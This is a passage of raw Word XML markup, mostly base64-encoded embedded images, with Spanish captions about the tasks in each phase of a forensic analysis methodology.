I7982djZkwKqivvY+uxA7gZG4P5s6di9prj&#10;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&#10;mYM6INwnDzHoPNP//fkP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Cq7oUdIgMAAPkKAAAOAAAAAAAAAAAAAAAAADoCAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItAAoAAAAAAAAAIQCqvxS73GEDANxhAwAUAAAAAAAAAAAAAAAAAIgFAABkcnMv&#10;bWVkaWEvaW1hZ2UxLnBuZ1BLAQItAAoAAAAAAAAAIQB5cTgTRQcDAEUHAwAUAAAAAAAAAAAAAAAA&#10;AJZnAwBkcnMvbWVkaWEvaW1hZ2UyLnBuZ1BLAQItAAoAAAAAAAAAIQBVTe3FmvgAAJr4AAAUAAAA&#10;AAAAAAAAAAAAAA1vBgBkcnMvbWVkaWEvaW1hZ2UzLnBuZ1BLAQItABQABgAIAAAAIQBzlekZ3wAA&#10;AAcBAAAPAAAAAAAAAAAAAAAAANlnBwBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEANydH&#10;YcwAAAApAgAAGQAAAAAAAAAAAAAAAADlaAcAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYA&#10;AAAACAAIAAACAADoa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alt="Imagen que contiene Tabla&#10;&#10;Descripción generada automáticamente" style="position:absolute;top:237;width:23679;height:30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WywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gq9FN1oqmjqKlJo6UnaKOjxkX0mwd23Ibua6K/vFgo9DjPzDbNc99aIK7W+dqxgPEpA&#10;EBdO11wq2O/eh3MQPiBrNI5JwY08rFeDhyVm2nX8Tdc8lCJC2GeooAqhyaT0RUUW/cg1xNE7udZi&#10;iLItpW6xi3Br5CRJZtJizXGhwobeKirO+cUqWLjteXcpnnt3n5mP7dehM9NjqdTTY795BRGoD//h&#10;v/anVpCmL4v5JE3G8Hsp3gG5+gEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD/tbjWywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:imagedata r:id="rId89" o:title="Imagen que contiene Tabla&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="Imagen 4" o:spid="_x0000_s1028" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:23156;width:20511;height:30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cz1yAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NTsMw&#10;EITvSLyDtUjcqMNPmjbUrRBSVI7Qwn0bL3FEvA62icPbYyQkjqOZ+Uaz2c12EBP50DtWcL0oQBC3&#10;TvfcKXg9NlcrECEiaxwck4JvCrDbnp9tsNYu8QtNh9iJDOFQowIT41hLGVpDFsPCjcTZe3feYszS&#10;d1J7TBluB3lTFEtpsee8YHCkR0Ptx+HLKtgfT5iaavbNGz3vDX+m5e2UlLq8mB/uQUSa43/4r/2k&#10;Fdyti7KqylUJv5fyHZDbHwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBChcz1yAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId90" o:title="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="Imagen 5" o:spid="_x0000_s1029" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:42157;top:2018;width:23933;height:10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EuNygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvhbyD2EJvjZyQ2okbJYRCaU+lcQK5LtbGcmutjCX/9O2rQiHHYWa+Ybb7yTZioM7XjhUs5gkI&#10;4tLpmisF59Pr4xqED8gaG8ek4Ic87Hezuy3m2o18pKEIlYgQ9jkqMCG0uZS+NGTRz11LHL2r6yyG&#10;KLtK6g7HCLeNXCZJKi3WHBcMtvRiqPwueqtg/Jx8+pGF/nIs3rLNVzMsTS+VerifDs8gAk3hFv5v&#10;v2sF2Xq1eVql2QL+LsU7IHe/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAvoS43KAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:imagedata r:id="rId91" o:title="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006F21A3" w:rsidRPr="006F21A3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En cada una de las fases indicadas en la imagen anterior podemos destacar las siguientes tareas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24760E" w14:textId="79441DDB" w:rsidR="007B14FB" w:rsidRPr="007B14FB" w:rsidRDefault="007B14FB" w:rsidP="007B14FB">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B14FB">
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidRPr="007B14FB">
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007B14FB">
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007B14FB">
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="007B14FB">
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007B14FB">
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc155782569"/>
      <w:r w:rsidRPr="007B14FB">
        <w:rPr>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tareas relacionadas con las fases de la metodología del análisis forense.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="47A13323" w14:textId="77777777" w:rsidR="00933CF8" w:rsidRPr="00933CF8" w:rsidRDefault="00933CF8" w:rsidP="00933CF8">
